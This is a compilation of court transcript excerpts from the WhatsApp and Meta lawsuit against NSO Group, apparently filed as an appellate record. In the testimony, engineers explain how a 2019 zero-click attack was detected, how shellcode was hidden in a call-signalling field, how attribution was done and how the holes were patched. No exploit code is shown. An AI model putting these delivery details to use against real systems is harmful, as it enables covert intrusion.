Q.   AND WHAT DO YOU MEAN BY THAT, AN OPERATIONAL SECURITY FAILURE THAT NSO GROUP HAD MADE?

        MR. AKROTIRIANAKIS:  OBJECTION.  MISSTATES THE TESTIMONY AS TO THE -- WHO "THEY" IS.

        MR. BLOCK:  I BEG YOUR PARDON.

        THE COURT:  SUSTAINED.

BY MR. BLOCK:

Q.   DID YOU REACH A CONCLUSION --

        SORRY, YOUR HONOR.  MAY I PROCEED?

        THE COURT:  PROCEED.

BY MR. BLOCK:

Q.   DID YOU REACH A CONCLUSION ABOUT WHO MADE THE OPERATIONAL SECURITY FAILURE THAT YOU DISCOVERED?

A.   YES.  WE FOUND THAT IT WAS THE NSO GROUP.

Q.   OKAY.  WHAT DID YOU MEAN WHEN YOU WERE DESCRIBING AN OPERATIONAL SECURITY FAILURE BY THE NSO GROUP?

A.   SO AN OPERATIONAL SECURITY FAILURE IS A MISTAKE THAT THEY MADE.  NORMALLY ATTACKERS TAKE STEPS LIKE TRYING TO HIDE THE FACT THAT THEY'RE MAKING A CALL TO A VICTIM, THEY TRIED TO HIDE THE FACT -- THEY TRY TO HIDE WHO IT IS CONDUCTING THE ATTACK.

AND SO AN OPERATIONAL SECURITY FAILURE IS JUST A, A FAILURE ON THEIR PART TO COMPLETELY HIDE THEIR IDENTITY.

Q.   AND WHAT WAS THE FAILURE HERE?

A.   THE FAILURE HERE WAS THAT THERE WAS AN NSO GROUP DOMAIN, A DOMAIN THAT THEY VERY CLEARLY OWNED, WHICH WERE TIED -- WHICH WAS AFFILIATED WITH ONE OF THE I.P. ADDRESSES THAT WE OBSERVED.

Q.   OKAY.  DURING THE MAY 2019 RESPONSE TO NSO'S ATTACKS ON WHATSAPP, DID YOU TRY TO DISCOVER THE CONTENTS OF THE SOFTWARE THAT WAS ON THOSE I.P. ADDRESSES THAT THE ELF FILES POINTED AT?

A.   I DID.

Q.   WHY DID YOU DO THAT?

A.   HAVING A FULL AND COMPLETE PICTURE OF WHAT'S GOING ON IN THE ATTACK HELPS US BETTER IMPLEMENT OUR DEFENSES FOR OUR USERS.

Q.   WERE YOU ABLE TO GET A COPY OF THAT SOFTWARE?

A.   I WAS NOT.

Q.   WHY NOT?

A.   THEY HAD TAKEN STEPS TO MAKE IT SO THAT ONLY ONE VICTIM, OR ONLY ONCE PER VICTIM WOULD THAT MALWARE BE SERVED UP.

Q.   FOR THE PORTION OF THE ATTACK THAT YOU WERE ABLE TO OBSERVE, DID WHATSAPP AND META TAKE STEPS TO STOP THOSE ATTACKS FROM FUNCTIONING?

A.   WE DID.

Q.   OKAY.  CAN WE HAVE PAGE 930.21, PLEASE.

     MR. ROBINSON, WOULD YOU JUST EXPLAIN TO THE JURY THE TOPIC OF THIS SLIDE YOU CREATED?

A.   SO THIS IS ME GOING OVER THE TOPIC OF THE PATCHING THAT WE PERFORMED ON BOTH OUR SERVER AND THE WHATSAPP APPLICATION ITSELF.

Q.   THE FIRST BULLET SAYS, "COORDINATING THE PATCH WAS COMPLICATED."

     WHAT DID YOU MEAN BY THAT?

A.   RIGHT.  SO THERE WERE -- AS I SAID, THERE WERE TWO VULNERABILITIES HERE, AND WE HAD THE MEANS TO PATCH ONE OF THEM BEFORE WE HAD THE ABILITY TO PUSH OUT A FIX FOR THE OTHER.

     SO THE SERVER SIDE FIX WAS ONE THAT WE CAN PUSH QUICKLY, OR MORE QUICKLY, THAN THE ONE THAT WE COULD PUSH FOR THE ACTUAL APPLICATION ITSELF.

     BUT IN DOING SO, WE WOULD LET NSO GROUP KNOW THAT WE WERE ON TO THEM, AND WE NEEDED TO MAKE SURE THAT WHATEVER FIXES WE

PUSHED WERE COMPLETE AND WOULD NOT ALLOW ANY FURTHER

EXPLOITATION OF THE PHONES.

SO WE NEEDED TO MAKE SURE THAT -- WE NEEDED TO BE

CONFIDENT THAT ONCE WE PUSHED THESE PATCHES, THAT WE WERE

PUSHING OUT A FIX THAT WOULD PREVENT FURTHER EXPLOITATION.

Q.   OKAY.  CAN WE SEE THE PREVIOUS SLIDE, 930.20.

WHAT DID YOU MEAN BY "VICTIM PERSPECTIVE," MR. ROBINSON?

A.   SO THIS IS WHAT IT WOULD LOOK LIKE IF YOU WERE THE

RECIPIENT OF ONE OF NSO GROUP'S ATTACKS.

Q.   AND WHAT IS YOUR UNDERSTANDING OF HOW THAT ATTACK WOULD

LOOK IF YOU WERE ONE OF THE RECIPIENTS?

A.   SO YOUR PHONE MAY OR MAY NOT START RINGING.  SOMETIMES

THAT STOP SERVICE THAT I TALKED ABOUT EARLIER, IT MIGHT NOT

WORK.  IT DEPENDS ON THE VERSION OF YOUR PHONE.

BUT IF IT DOES START RINGING, IT WILL STOP RINGING BEFORE

YOU HAD THE CHANCE TO ANSWER IT, AND AT THAT POINT THERE WAS

NOTHING AS A VICTIM THAT YOU COULD DO.  THIS IS WHAT WE CALL A

ZERO-CLICK VULNERABILITY.  WITHOUT THE USER DOING ANYTHING, THE

PHONE IS THEN INFECTED.

Q.   OKAY.  SWITCHING GEARS A LITTLE BIT, MR. ROBINSON.

CAN YOU ESTIMATE HOW MUCH TIME YOU PERSONALLY SPENT ON

WHATSAPP AND META'S RESPONSE TO NSO'S ATTACKS?

A.   APPROXIMATELY 3- TO 400 HOURS.

Q.   AND WAS ALL OF THAT TIME IN THE MAY 2 TO MAY 13 PERIOD?

A.   NO.

Q.   WHAT DID YOU DO AFTER MAY 13TH?

A.   SO AFTER MAY 13TH, WE STILL HAD WORK TO DO UNDERSTANDING THE, THE -- WHO ALL WAS PART OF THIS ATTACK.  SO THERE WAS ATTRIBUTION WORK THAT WENT JUST BEYOND NSO GROUP ITSELF.  WE WERE ALSO INTERESTED IN DETERMINING WHO WAS SPONSORING IT.

Q.   OKAY.  DID ANY OF YOUR WORK INVOLVE IDENTIFYING THE WHATSAPP USERS WHO WERE TARGETED IN THE ATTACKS THAT YOU WERE ABLE TO OBSERVE?

A.   IT DID.

Q.   WHY DID YOU WORK ON IDENTIFYING THE TARGETED USERS AS PART OF THE RESPONSE TO THESE ATTACKS?

A.   SO THAT LEADS BACK TO UNDERSTANDING WHO THE SPONSORS ARE OF THE ATTACKS.  IF WE UNDERSTAND WHO THE USERS ARE, WE CAN DETERMINE WHO IS LIKELY -- WANTS TO TARGET THOSE INDIVIDUALS.

Q.   MR. EVANS, CAN WE PLEASE HAVE PAGE 930.4.

MR. ROBINSON, WILL YOU PLEASE EXPLAIN THIS SLIDE 4 TO THE JURY?

A.   SO THIS SLIDE IS JUST ME RECOGNIZING THAT THERE WERE A VERY LARGE NUMBER OF PEOPLE WHO WORKED ON THIS PROJECT, AND I DID NOT INTERACT WITH THEM ALL.  SO THIS IS JUST ME ATTEMPTING TO GIVE CREDIT TO THE LARGE NUMBERS, THOSE LARGE NUMBERS OF INDIVIDUALS.

Q.   OKAY.  AND DO YOU HAVE A MEMORY OF EVERY INDIVIDUAL WHO PARTICIPATED IN RESPONDING TO NSO'S ATTACKS?

A.   NO.

CERTIFICATE OF REPORTERS


WE, THE UNDERSIGNED OFFICIAL COURT REPORTERS OF THE UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF CALIFORNIA, 280 SOUTH FIRST STREET, SAN JOSE, CALIFORNIA, DO HEREBY CERTIFY:

THAT THE FOREGOING TRANSCRIPT, CERTIFICATE INCLUSIVE, IS A CORRECT TRANSCRIPT FROM THE RECORD OF PROCEEDINGS IN THE ABOVE-ENTITLED MATTER.

_____
IRENE RODRIGUEZ, CSR, CRR
CERTIFICATE NUMBER 8076


_____
LEE-ANNE SHORTRIDGE, CSR, CRR
CERTIFICATE NUMBER 9595


DATED:  APRIL 30, 2025

UNITED STATES COURT REPORTERS

**SER-95**

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 96 of 157
Case 4:19-cv-07123-PJH    Document 749    Filed 06/05/25    Page 1 of 253

265

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | | |
|---|---|---|
| WHATSAPP LLC AND META PLATFORMS, INC., | ) | C-19-07123 PJH |
| | ) | OAKLAND, CALIFORNIA |
| PLAINTIFFS, | ) | APRIL 29, 2025 |
| VS. | ) | VOLUME 2 |
| NSO GROUP TECHNOLOGIES LIMITED AND Q CYBER TECHNOLOGIES LIMITED, | ) | PAGES 265-516 |
| DEFENDANTS. | ) | |

TRANSCRIPT OF PROCEEDINGS
BEFORE THE HONORABLE PHYLLIS J. HAMILTON
UNITED STATES DISTRICT JUDGE

A P P E A R A N C E S:

FOR THE PLAINTIFFS:      DAVIS POLK & WARDWELL
                         BY:  GREG D. ANDRES
                              ANTONIO J. PEREZ
                         450 LEXINGTON AVENUE
                         NEW YORK, NEW YORK  10017

                         BY:  MICAH G. BLOCK
                         900 MIDDLEFIELD ROAD, SUITE 200
                         REDWOOD CITY, CALIFORNIA  94063

OFFICIAL COURT REPORTERS:    LEE-ANNE SHORTRIDGE, CSR, CRR
                             CERTIFICATE NUMBER 9595
                             IRENE RODRIGUEZ, CSR, RMR, CRR
                             CERTIFICATE NUMBER 8074

PROCEEDINGS RECORDED BY MECHANICAL STENOGRAPHY
TRANSCRIPT PRODUCED WITH COMPUTER

COMPANIES IN ISRAEL. AS YOU HEARD, ONE DEFENDANT IS NSO GROUP TECHNOLOGIES, LIMITED, AND THE OTHER DEFENDANT IS ITS PARENT COMPANY, Q CYBER TECHNOLOGIES, LIMITED.

AS THE NAME SUGGESTS, NSO IS A TECHNOLOGY COMPANY. THE TECHNOLOGY THAT IT DEVELOPS ARE INTELLIGENCE GATHERING PRODUCTS THAT NSO LICENSES EXCLUSIVELY TO GOVERNMENT AGENCIES.

NSO'S MAIN OFFERING TO ITS GOVERNMENT CUSTOMERS IS A SUITE OF TECHNOLOGIES THAT ARE MARKETED UNDER THE NAME BRAND PEGASUS. PEGASUS IS COMPRISED OF A COLLECTION OF PROGRAMS THAT HAVE BEEN LICENSED BY GOVERNMENTS AND GOVERNMENT AGENCIES AROUND THE WORLD. NSO HAS NEVER LICENSED PEGASUS TO ANY KIND OF CUSTOMER OTHER THAN A GOVERNMENT AGENCY.

AS MR. PEREZ STATED, I THINK -- WELL, I STOPPED COUNTING AFTER EIGHT TIMES.

FACEBOOK IS GOING TO BE CALLING PEGASUS "SPYWARE" THROUGHOUT THIS TRIAL, AND WHEN YOU THINK OF THE TERM "SPYWARE," IT CONJURES THOUGHTS OF SCAMMERS WHO ARE TRYING TO STEAL BANK ACCOUNT OR CREDIT CARD INFORMATION.

PEGASUS IS NOT THAT.

FACEBOOK -- FACEBOOK IS GOING TO TRY AND SCARE YOU INTO THINKING THAT IT CAN BE USED FOR THAT, BUT YOU'RE NOT GOING TO HEAR ANY EVIDENCE THAT PEGASUS WAS EVER LICENSED TO OR USED BY SCAMMERS. IT WAS ONLY USED BY GOVERNMENTS.

AND SPYWARE IS AN INTERESTING WORD. SPYING, AFTER ALL, IS ALL ABOUT GATHERING INTELLIGENCE AND INFORMATION, AND PEGASUS

Q.   COULD YOU FLIP TO PLAINTIFFS' EXHIBIT 13, PLEASE?  AND LET ME KNOW WHEN YOU HAVE IT IN FRONT OF YOU.

A.   YES.

Q.   DO YOU RECOGNIZE PLAINTIFFS' EXHIBIT 13?

A.   YES.  THIS WAS THE INITIAL TASK, OR PROJECT, THAT JESUS WAS WORKING ON THAT LED TO THE DISCOVERY OF THIS ATTACK.

Q.   WHAT IS A TASK AS THAT TERM IS USED AT WHATSAPP?

A.   A TASK IS ESSENTIALLY A DOCUMENT THAT CONTAINS ALL THE INFORMATION RELATED WITH THE PROJECT FOR TRACKING PURPOSES.  WE USE THAT INTERNALLY FOR TRACKING ALL THE ENGINEERING WORK.

Q.   IS THAT A STANDARD PART OF WHATSAPP PRACTICE TO KEEP RECORDS IN THIS FORM?

A.   YES, WE KEEP RECORDS LIKE THIS FOR ANY PROJECT WE HAD.

MR. PEREZ:  YOUR HONOR, I'D LIKE TO OFFER PLAINTIFFS' EXHIBIT 13 INTO EVIDENCE AND ASK THAT IT BE PUBLISHED TO THE JURY.

THE COURT:  ANY OBJECTION?

MR. AKROTIRIANAKIS:  NO, YOUR HONOR.  THANK YOU.

THE COURT:  IS THIS MARKED PTX?

MR. PEREZ:  13, YES.

THE COURT:  ALL RIGHT.  ADMITTED.

(PLAINTIFFS' EXHIBIT PTX-13 WAS ADMITTED IN EVIDENCE.)

BY MR. PEREZ:

Q.   GREAT.  SO THE JURY NOW HAS IN FRONT OF IT PTX-13.

CAN YOU EXPLAIN AGAIN WHAT THIS TASK PERTAINS TO?

A.   SO THIS IS A TASK THAT WAS FILED A WHILE BEFORE WE FOUND THE ATTACK, AND THE PURPOSE OF THIS TASK WAS TO VALIDATE CERTAIN MESSAGES SENT FROM THE WHATSAPP APPS TO THE SIGNALLING SERVER.

Q.   AND WHEN YOU SAY TO VALIDATE THOSE MESSAGES, OR THE STANZAS, WHAT DOES THAT MEAN?

A.   THE WHATSAPP APPLICATION HAS A SPECIFIC PROTOCOL THAT IT USES TO COMMUNICATE WITH THE SIGNALLING SERVER, AND WE THOUGHT THAT IT WAS USEFUL TO VALIDATE THAT, THE MESSAGES SENT BY THE WHATSAPP APPS THAT ARE CONFORMING WITH THE PROTOCOL THAT THE SIGNALLING SERVER IS EXPECTING.

Q.   AND HOW DOES THIS WORK RELATE TO THE DISCOVERY OF NSO'S ATTACK?

A.   SO AS WE'RE DOING THIS VALIDATION WORK, WE BASICALLY -- LIKE, WE WERE NOT LOOKING FOR AN ATTACK.  WE JUST SAW SOME INVALID MESSAGES BEING SENT, AND WE LOOKED INTO MORE DETAILS.

THESE ARE NOT THE ONLY INVALID MESSAGES THAT WE WERE SEEING.  WE WERE SEEING SOME OTHER INVALID MESSAGES THAT WERE SOMETIMES CAUSED BY JUST BUGS IN THE SOFTWARE OR OTHER REASONS.

SO THIS ONE WAS SPECIFICALLY ALARMING BECAUSE IT HAD, YOU KNOW, SOME REALLY SUSPICIOUS CONTENT IN IT.

Q.   IF I COULD DIRECT YOUR ATTENTION TO THE PAGE ENDING 0006. THERE'S A MESSAGE THERE FROM MR. PALAU WHERE HE WRITES, "CANARYING STANZA VALIDATION IN CHATD555.ATN, SOME VALIDATIONS FAILED."

WHAT DOES THAT MEAN?

A.   SO FIRST OF ALL, THE PROCESS OF CANARYING IS A PROCESS OF TAKING A CHANGE AND RUNNING IT IN PRODUCTION, WITH PRODUCTION TRAFFIC.

AND JESUS POSTED ABOUT THIS BECAUSE HE REACHED A MILESTONE WITH THE DEVELOPMENT OF THIS PROJECT WHERE HE WAS READY TO TEST HIS NEW LOGIC WITH PRODUCTION TRAFFIC, BUT ONLY IN -- WITH A SMALL AMOUNT OF TRAFFIC FROM PRODUCTION, AND THAT'S WHY WE USED THE CONCEPT OF CANARYING.

BY STANZA, STANZA MEANS A SIGNALLING MESSAGE, ESSENTIALLY. SO IT'S A MESSAGE SENT BY THE WHATSAPP APP TO THE SIGNALLING SERVER.

AND THAT CODE NAME CHATD555.ATN REFERS TO ONE SPECIFIC SERVER THAT WAS RUNNING THE SIGNALLING SERVER, WHICH WAS LOCATED IN ALTOONA, WHICH WAS THE DATA CENTER WE HAD AT THAT POINT.

Q.   WHAT DOES IT MEAN THAT SOME VALIDATIONS FAILED?

A.   IT MEANS THAT HIS NEW VALIDATION LOGIC WAS DETECTING SOME FAILURES IN PRODUCTION.

Q.   IF WE LOOK TOWARDS THE BOTTOM OF THE PAGE ENDING IN 0009, THERE'S AN ENTRY FROM MR. PALAU WHERE HE WRITES, "FOUND THIS CALL OFFER" -- I'LL WAIT UNTIL IT'S UP ON THE SCREEN.  "FOUND THIS CALL OFFER, WORTH TAKING A LOOK."

WHAT IS A CALL OFFER?

A.   A CALL OFFER IS A TYPE OF STANZA THAT HE WAS REFERRING

EARLIER.  SO IT'S A TYPE OF SIGNALLING MESSAGE THAT IS SENT BY THE WHATSAPP APP WHENEVER IT INITIATES A CALL.

Q.   AND WHERE DOES THE CALL OFFER TRAVEL FROM THE CALLER DEVICE THROUGH THE SERVER?

A.   SO THE WAY IT WORKS IS THE INITIATING APP SENDS THE CALL OFFER TO THE SIGNALLING SERVER; THE SIGNALLING SERVER PERFORMS SOME MINOR MODIFICATIONS TO IT; AND THEN IT FORWARDS THAT OFFER TO THE DEVICE -- TO THE APP OF THE CALLEE.

SO THEN THE PERSON YOU'RE TRYING TO CALL'S PHONE STARTS RINGING.  SO THAT'S HOW IT STARTS RINGING IS BECAUSE OF THIS CALL OFFER THAT WAS BEING FORWARDED.

Q.   AND HOW LONG DOES THAT PROCESS TAKE FROM THE INITIATION OF THE CALL OFFER TO IT BEING RECEIVED BY THE CALLEE DEVICE?

A.   IT DEPENDS.  IT DEPENDS ON MANY FACTORS.

BUT ASSUMING THAT THE CALLEE IS CONNECTED TO THE INTERNET, IT WILL TAKE, ESSENTIALLY, MILLISECONDS, OR LIKE A FRACTION OF A SECOND.

Q.   AFTER THE LINK IN HIS NOTE HE WRITES, "LOOKED AT USER ACCOUNT, THIS IS THE REGISTERED DEVICE."

AND IT SAYS, "DEVICE_NAME: SAMSUNG-VMWARE_VIRTUAL_PLATFORM."

WHAT DOES THAT REFLECT?

A.   SO A REGULAR DEVICE NAME IS SOMETHING LIKE A VERSION OF AN IPHONE OR LIKE AN ANDROID VERSION 5, SOMETHING LIKE THAT.  SO THAT'S WHAT WE NORMALLY USE WHEN YOU SEE A DEVICE NAME.

BUT THIS DEVICE NAME IS VERY UNUSUAL, SO IT POINTS TO ESSENTIALLY A VIRTUAL MACHINE, WHICH IS IN FACT AN EMULATOR THAT WAS RUNNING A FAKE LINE.

SO THIS WAS NOT AN ORDINARY WHATSAPP APPLICATION.

Q.   AND WHAT IS THE DATE OF THIS ENTRY FROM MR. PALAU?

A.   THE DATE?

Q.   YES.

A.   MAY 2ND.

Q.   AT THE VERY BOTTOM OF THIS PAGE THERE'S A MESSAGE FROM IBRAHIM MOHAMED.  WHO IS MR. MOHAMED?

A.   MR. MOHAMED IS A SECURITY ENGINEER WHO WAS BASED IN LONDON AT THAT TIME, AND HE WAS WORKING WITH US ON VARIOUS SECURITY RELATED PROJECTS.

Q.   HE WRITES IN HIS MESSAGE, "THERE IS THIS STRING," AND THEN HIS MESSAGE CONTINUES AT THE TOP OF THE NEXT PAGE, AND THERE'S A BLOCK OF TEXT.

WHAT DOES THIS BLOCK OF TEXT REFLECT?

A.   SO THIS BLOCK OF TEXT REFLECTS THE MALICIOUS MESSAGE THAT I WAS MENTIONING EARLIER THAT CONTAINS WHAT WE CALL A SHELL CODE OR AN EXPLOIT.

IT LOOKS LIKE -- NORMALLY THIS FIELD WILL HAVE A STRING VALUE IN IT, LIKE SOMETHING THAT A HUMAN CAN READ.

BUT WHAT WE HAVE HERE IS A BUNCH OF INSTRUCTIONS THAT THE COMPUTER CAN READ.  SO THEY'RE NOT MEANT FOR, FOR HUMAN -- DEFINITELY NOT MEANT FOR CONSUMPTION OF THE WAY IT WAS, THAT

FIELD WAS MEANT TO BE USED.

Q.   WHAT WAS YOUR REACTION TO SEEING THIS?

AND, PLEASE, MR. GHEORGHE, IF YOU NEED WATER, GO AHEAD.  I FEEL LIKE I KEEP INTERRUPTING YOUR EFFORT TO TAKE A SIP.

A.   YEAH, I'M GOOD.

I MEAN, I -- I'VE SEEN -- IT LOOKS LIKE SHELL CODE.  IT LOOKS LIKE AN EXPLOIT.  IT LOOKS LIKE SOMETHING MALICIOUS. I'VE STUDIED THINGS LIKE THAT IN SCHOOL AND I'VE HEARD ABOUT THEM OR I'VE READ ABOUT THEM, BUT I'VE NEVER SEEN THEM IN REAL LIFE.

SO IT LOOKED VERY SUSPICIOUS.  IT'S DEFINITELY NOT SOMETHING THAT YOU WOULD SEE FROM A REGULAR WHATSAPP APPLICATION.

Q.   DO YOU RECALL WHAT FIELD THIS SHELL SCRIPT APPEARED IN?

A.   YES.  THE NAME OF THE FIELD, I THINK IT WAS TONE_DESC. IT'S A VERY SPECIFIC NAME.  SO IT'S TONE DESC, TONE_DESC, D-E-S-C.  T-O-N-E.

YEAH, SO IT'S A FIELD THAT WE -- I CAN'T REMEMBER EXACTLY HOW WE WERE USING IT.  IT WAS DESIGNED TO CONTROL SOME LOGIC ON THE WHATSAPP APPLICATION RELATED WITH THE PATTERN OF THE RING TONE UPON RINGING.

BUT I -- I BELIEVE IT WASN'T EVEN IN USE AT THE TIME.

SO WE USED IT AT SOME POINT, AND IT WASN'T IN USE AT THE TIME IT WAS DEPRECATED.

Q.   IS THAT A FIELD THAT A REGULAR WHATSAPP USER HAS THE

ABILITY TO MODIFY?

A.   NO, NEVER.  THAT FIELD WAS SUPPOSED TO BE FILLED IN ONLY BY THE SIGNALLING SERVER.  IT WAS NEVER SUPPOSED TO BE SENT BY THE CLIENT.

Q.   AND WHEN YOU SAY "THE CLIENT," WHAT DO YOU MEAN?

A.   I MEAN THE WHATSAPP APPLICATION THAT INITIATES THE CALL.

Q.   IS THIS A FIELD THAT A REGULAR WHATSAPP USER WOULD HAVE THE ABILITY TO SEE?

A.   NO.  THIS IS PART OF THE METADATA THAT IS BEING EXCHANGED WHEN THE RINGING PROCESS STARTS IN THE CALL.  SO NONE OF THIS WOULD BE VISIBLE.

Q.   AND WHAT -- THERE'S A SERIES -- AFTER THE FIRST THREE LINES, THERE'S SORT OF A SERIES OF LINES, MANY OF WHICH START WITH THE LETTER X AND THEN SOME NUMBERS.

     WHAT DOES THAT PORTION REFLECT?

A.   THAT PORTION IS ESSENTIALLY BINARY CODE.  SO BINARY CODE IS ESSENTIALLY, THEY'RE A SET OF INSTRUCTIONS THAT ARE MEANT TO BE READ ONLY BY COMPUTERS.  SO IT'S -- IT'S A PROGRAM MEANT TO BE EXECUTED BY A COMPUTER, BUT IT'S UNREADABLE BY HUMANS.

Q.   WHAT WAS DONE WITH THAT ENCODED INFORMATION?

A.   SO WE DID SOME RESEARCH AND WE TOOK THIS BINARY CODE AND WE REVERSE ENGINEERED IT INTO A FORMAT THAT WAS READABLE TO HUMANS, AND BASED ON MY RECOLLECTION, I REMEMBER THIS CODE WAS ESSENTIALLY CONNECTING TO AN EXTERNAL SERVER OUTSIDE OF THE CONTROL THAT WE HAD.  IT WAS DOWNLOADING SOME DATA AND THEN IT

WAS EXECUTING THAT DATA.

Q.   DO YOU RECALL WHO DID THAT WORK OF REVERSE ENGINEERING THIS CODE?

A.   YES.   THAT WORK WAS PERFORMED BY THE MALWARE ANALYSIS TEAM, WHICH WAS A TEAM IN THE FACEBOOK SECURITY TEAM, AND THE ENGINEER WHO WORKED ON IT WAS DREW ROBINSON.

Q.   OKAY.   IF WE GO TO PAGE 0011, IN THE MIDDLE OF THE PAGE THERE IS AN ENTRY FROM MR. PALAU, AND HE WRITES, "THESE ARE ALL THE FAILED STANZAS (USING THE NEW VALIDATION METHOD) FOR THE PAST HOUR."

     WHAT DOES THAT REFLECT?

A.   SO JESUS POSTED AN UPDATE ON THE NUMBER OF FAILED VALIDATIONS WE WERE SEEING.   AND THIS COMMENT WAS POINTING TO ANOTHER DOCUMENT THAT HAD MORE DETAILS ABOUT WHERE THE FAILURE HAPPENED AND HOW MANY OF THEM WERE THEY.

Q.   AND WHEN DID WHATSAPP START LOGGING THESE STANZAS?

A.   I BELIEVE THAT WE STARTED LOGGING IT EXACTLY THE SAME DAY. SO I THINK WITH HIS CHANGE THAT HE MENTIONED HERE, THIS IS WHEN WE ACTUALLY STARTED LOGGING FAILURES RELATED TO THIS ATTACK.

Q.   IF WE GO TO THE PAGE ENDING IN 0014, MR. PALAU WRITES AT THE TOP OF WHAT YOU HOPEFULLY SEE ON YOUR SCREEN, "ADDING ALL THE MALICIOUS OFFER STANZAS SINCE WE STARTED LOGGING THEM. TOTAL NUMBER:  1568."

     WHAT DOES THAT MEAN?

A.   JESUS WAS PROVIDING AN UPDATE ON --

MR. AKROTIRIANAKIS: OBJECTION. FOUNDATION, YOUR HONOR.

THE COURT: YEAH, YOU NEED TO ESTABLISH A FOUNDATION.

BY MR. PEREZ:

Q. DO YOU HAVE AN UNDERSTANDING --

THE COURT: HIS UNDERSTANDING.

BY MR. PEREZ:

Q. DO YOU HAVE AN UNDERSTANDING OF WHAT THIS REFLECTS?

A. YES.

Q. WHAT DOES IT REFLECT?

MR. AKROTIRIANAKIS: OBJECTION, YOUR HONOR. FOUNDATION.

THE COURT: WHAT IS HIS UNDERSTANDING BASED ON?

BY MR. PEREZ:

Q. WHAT IS YOUR UNDERSTANDING BASED ON?

A. MY UNDERSTANDING IS BASED ON HAVING MANY DETAILS, LIKE, I HAD A LOT OF INSIGHTS INTO WHAT JESUS'S WORK WAS RELATED IN THIS TASK.

Q. WHAT WAS YOUR ROLE WITH RESPECT TO THIS INVESTIGATION WORK THAT WAS GOING ON AT THIS TIME?

A. MY ROLE WAS TO COORDINATE ALL THE ENGINEERING WORK FROM THE WHATSAPP SIDE IN ORDER TO UNBLOCK THE -- UNDERSTANDING OF THE ATTACK, AND TO DEPLOY A REMEDIATION AS SOON AS POSSIBLE.

Q. AND WHAT WAS YOUR REPORTING RELATIONSHIP WITH MR. PALAU?

A. JESUS WAS A MEMBER OF MY TEAM. HE WAS A MEMBER OF THE

VOICE AND VIDEO CALLING INFRASTRUCTURE TEAM.

Q.   SO YOU WERE OVERSEEING HIS WORK ON THIS INVESTIGATION?

A.   YES.

Q.   AND IN THAT CONTEXT, DID YOU DEVELOP AN UNDERSTANDING OF WHAT HE WAS COUNTING HERE WITH THE 1568 MALICIOUS OFFER STANZAS?

A.   YES.  SO THESE ARE THE TOTAL NUMBER --

          MR. AKROTIRIANAKIS:  OBJECTION, YOUR HONOR.  HEARSAY.

          THE COURT:  OVERRULED.

BY MR. PEREZ:

Q.   WHAT ARE THEY?

A.   THESE ARE TOTAL NUMBER OF FAILED VALIDATIONS THAT WE WERE SEEING IN PRODUCTION FROM THE MOMENT WE STARTED LOGGING UNTIL THE MOMENT HE POSTED THIS UPDATE, WHICH WAS MAY 6TH.

Q.   AND COULD THOSE BE FAILED VALIDATIONS FOR ANY REASON?

A.   NO.  THIS SPECIFIC LOGGING -- THIS LOGGING WAS VERY SPECIFIC TO THE SUSPICIOUS MESSAGES THAT JESUS FOUND.  SO WE ADDED DEDICATED LOGGING FOR DETECTING THESE, AND ALL OF THESE WERE RELATED TO THOSE.

Q.   AND SO 1568 INSTANCES OF THAT MESSAGE IN THE PERIOD THAT YOU WERE LOGGING?

A.   YES, STARTING FROM THE MOMENT WE STARTED -- INITIATED THE LOGGING UNTIL THE MOMENT HE GAVE THE UPDATE ON MAY 6TH.

Q.   SO FOUR DAYS?

A.   YES.

Q.   DO YOU HAVE ANY UNDERSTANDING OF HOW MANY TIMES THIS SHELL CODE TRANSITED WHATSAPP'S SERVERS, IF ANY, BEFORE THE LOGGING STARTED?

A.   NO, WE HAVE NO INSIGHT INTO THAT BECAUSE WE WERE NOT AWARE OF THIS HAPPENING, SO WE HAD NO LOGGING FOR IT.

Q.   WHAT WAS YOUR REACTION TO SEEING THE NUMBER OF INSTANCES IN WHICH THIS MALICIOUS STANZA HAD GONE THROUGH WHATSAPP SERVERS?

A.   SO IT WAS VERY WORRISOME.  OUR INITIAL EXPECTATION WAS THAT WE WILL SEE A VERY LOW NUMBER.  WE THOUGHT THAT THERE WAS JUST SOMEONE ON THE INTERNET, LIKE, MESSING AROUND WITH OUR SIGNALLING SERVER AND TRYING SOME THINGS, YOU KNOW, OUT.

BUT WHEN WE SAW THIS NUMBER, WE REALIZED THAT THIS IS NOT -- THIS IS NOT, YOU KNOW, SOMEONE TESTING SOMETHING OR PLAYING WITH IT.  LIKE, IT'S SOMETHING THAT THERE IS A CONSTANT STREAM OF EVENTS GOING, AND IT -- AT THE SAME TIME, IT WASN'T PROPORTIONAL WITH THE LEVEL OF TRAFFIC.  LIKE, WE WERE PROCESSING PROBABLY EVEN BILLIONS OF MESSAGES EVERY DAY.  SO IT'S MUCH LOWER THAN THAT.

SO IT REALLY POINTS TO THE WORST CASE SCENARIO, WHICH WAS A HIGHLY TARGETED ATTACK THAT WAS DEPLOYED IN PRODUCTION.

Q.   AND WHAT DO YOU MEAN BY "DEPLOYED IN PRODUCTION"?

A.   LIKE, IT WAS NOT TESTING.  LIKE, IT WAS NOT JUST ONE PERSON JUST, YOU KNOW, LIKE A SECURITY RESEARCHER TRYING TO FIND SOME THINGS IN WHATSAPP AND TESTING THINGS OUT.

CERTIFICATE OF REPORTERS

WE, THE UNDERSIGNED OFFICIAL COURT REPORTERS OF THE UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF CALIFORNIA, 280 SOUTH FIRST STREET, SAN JOSE, CALIFORNIA, DO HEREBY CERTIFY:

THAT THE FOREGOING TRANSCRIPT, CERTIFICATE INCLUSIVE, IS A CORRECT TRANSCRIPT FROM THE RECORD OF PROCEEDINGS IN THE ABOVE-ENTITLED MATTER.

_____
IRENE RODRIGUEZ, CSR, CRR
CERTIFICATE NUMBER 8076

_____
LEE-ANNE SHORTRIDGE, CSR, CRR
CERTIFICATE NUMBER 9595

DATED: APRIL 29, 2025

UNITED STATES COURT REPORTERS

# Exhibit 5

**REDACTED VERSION OF DOCUMENT PROPOSED**

**TO BE FILED UNDER SEAL**

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

Case #:    4:19-cv-07123-PJH

Plntf Exhibit No.   PTX-0066

Date Admitted:

By:

Kelly Collins, Deputy Clerk

**Custodian:**          Shaner, Josh

**Application:**        WhatsApp

**Active Participants:**

**Other Recipients:**

EXHIBIT
2039

**Date/Time Start:**     05/12/2019 08:31 AM

**Date/Time End:**       05/12/2019 11:58 AM

| Time | From | Message Body | Deleted |
|------|------|--------------|---------|
